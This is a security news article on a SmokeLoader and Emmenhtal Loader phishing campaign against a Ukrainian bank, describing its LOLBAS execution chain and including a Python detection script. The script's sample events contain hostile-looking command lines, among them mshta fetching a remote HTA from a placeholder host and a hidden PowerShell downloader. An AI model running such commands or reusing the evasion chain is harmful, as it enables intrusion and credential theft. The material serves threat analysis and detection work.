In a recent campaign targeting First Ukrainian International Bank (pumb[.]ua), G DATA security researchers uncovered a deeply layered and technically advanced malware chain. At the center of this operation is SmokeLoader, a well-known and powerful modular loader that's been enhanced with stealthy execution tactics and a lesser-known but increasingly popular intermediary: Emmenhtal Loader (aka EmmenHTAl or Peaklight).
This analysis exposes a refined infection strategy, one that combines social engineering, Living off the Land Binaries and Scripts (LOLBAS), and anti-analysis tactics to quietly deploy multiple malware stages without raising alarms.
The attack begins with a phishing email masquerading as a payment confirmation, containing an attachment named Платiжна_iнструкция.7z (translated: "Payment_instruction"). Inside the archive:

- A bait PDF mimicking financial documents
- A PDF shortcut (.lnk) designed to download additional payloads from a remote server

The report highlights the attackers' continued use of archive-based evasion techniques, noting that "In previous SmokeLoader campaigns, the threat actors exploited a 7-Zip zero-day vulnerability to bypass security checks using double-archived files, allowing malware execution." Although this campaign does not use the same exploit, it demonstrates the attackers' persistence in using archive-based evasion.
The .lnk file activates a PowerShell script that leverages Mshta, a legitimate Windows binary for executing HTML Applications. It downloads a malicious .hta file, blending into native system behavior to remain undetected.
"This is a common LOLBAS technique... allowing fileless execution and minimal visibility," the researchers note.
To further conceal the operation, the attackers use a modified DCCW.exe (Windows Display Color Calibration Wizard) as a loader, embedding JavaScript within the binary to execute malicious payloads with minimal footprint.
Emmenhtal, the loader stage, is cloaked in a crafted HTA file with a minimized window state and no taskbar presence. JavaScript embedded within the loader uses eval(erc) to execute additional obfuscated code.
"The executed variable contains another charCode-encoded script... which will be executed via wscript shell."
The script decodes and launches a PowerShell downloader, which checks for two files, invoice1202.pdf and putty1202.exe, and either executes them or retrieves fresh copies if missing.
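The execution chain described above (.lnk to PowerShell to mshta and a remote .hta, a script host handing off to a PowerShell downloader, a repurposed dccw.exe launching scripts, and the two artefact names the downloader looks for) can be expressed as a few process-creation detection rules. The following is an added example written for this article, not code from G DATA or from the report; it assumes Sysmon Event ID 1-style fields (ParentImage, Image, CommandLine) and runs over a small set of constructed events, including one benign PowerShell launch that must not fire.

```python
"""Added example (not from the G DATA report): flag the LOLBAS execution chain
described in the article in constructed process-creation events.

Assumed input shape: dicts with Sysmon Event ID 1 fields
(ParentImage, Image, CommandLine). All sample events below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    image: str
    command_line: str


# Script hosts involved in the chain the article describes.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}

# mshta pointed at a remote .hta, as in the PowerShell-to-mshta step.
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)

# File names the article says the PowerShell downloader checks for.
CHAIN_ARTIFACTS = ("invoice1202.pdf", "putty1202.exe")


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return one Finding per rule that fires on each event, in event order."""
    findings = []
    for ev in events:
        parent = basename(ev.get("ParentImage", ""))
        image = basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        low = cmd.lower()

        # Rule 1: mshta executing an HTA fetched from a remote server.
        if image == "mshta.exe" and REMOTE_HTA.search(cmd):
            findings.append(Finding("mshta_remote_hta", image, cmd))

        # Rule 2: a script host (the HTA's wscript shell) spawning PowerShell,
        # the hand-off to the downloader stage.
        if image == "powershell.exe" and parent in {"mshta.exe", "wscript.exe", "cscript.exe"}:
            findings.append(Finding("script_host_spawns_powershell", image, cmd))

        # Rule 3: the Display Color Calibration Wizard launching any script host;
        # dccw.exe has no legitimate reason to do this.
        if parent == "dccw.exe" and image in SCRIPT_HOSTS:
            findings.append(Finding("dccw_spawns_script_host", image, cmd))

        # Rule 4: command lines referencing the artefact names from the article.
        if any(name in low for name in CHAIN_ARTIFACTS):
            findings.append(Finding("smokeloader_chain_artifact_name", image, cmd))
    return findings


def rules_fired(events):
    """Convenience view: just the rule names, in order."""
    return [f.rule for f in analyze(events)]


# Constructed sample events; example.invalid is a placeholder host, not an IoC.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    # .lnk launches PowerShell, which invokes mshta against a remote .hta
    {"ParentImage": PS, "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": 'mshta "http://example.invalid/confirm.hta"'},
    # the HTA's wscript shell launches the PowerShell downloader
    {"ParentImage": "C:\\Windows\\System32\\mshta.exe", "Image": PS,
     "CommandLine": 'powershell -nop -w hidden -c "if(!(Test-Path $env:TEMP\\invoice1202.pdf)){ <download> }"'},
    # the repurposed calibration wizard spawns a script host
    {"ParentImage": "C:\\Windows\\System32\\dccw.exe",
     "Image": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "wscript.exe //B //NoLogo stage.js"},
    # benign: an administrator running an interactive PowerShell command
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}: {f.command_line}")
```

Rule 2 and rule 3 depend only on the parent/child pair, so they survive renamed scripts and changed URLs; rule 1 and rule 4 are the brittle string matches and are best treated as corroborating signals rather than stand-alone alerts.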
The final stage drops SmokeLoader, a versatile malware platform known for:

- Delivering secondary payloads
- Stealing browser and system credentials
- Injecting into legitimate processes
- Executing commands from remote C2 servers
- Employing anti-debugging and anti-analysis defenses

"This file is a SmokeLoader malware... using .NET Reactor for obfuscation and packing," G DATA confirms.
The use of .NET Reactor, more common in modern stealers, reflects a shift in malware tooling preferences, as attackers seek stronger evasion through commercial protectors.
G DATA also noted overlap in infrastructure and TTPs with other malware families, including Blustealer and Lumma, suggesting potential collaboration or shared platforms among cybercriminal operators.
A Wireshark packet capture confirms outbound connection attempts to 88[.]151[.]192[.]165, further indicating command-and-control activity tied to SmokeLoader's deployment.
"The availability of these feature-rich new loaders that are offered through Malware-as-a-Service (MaaS) enables threat actors to be more creative in customizing their attack chain," the researchers conclude.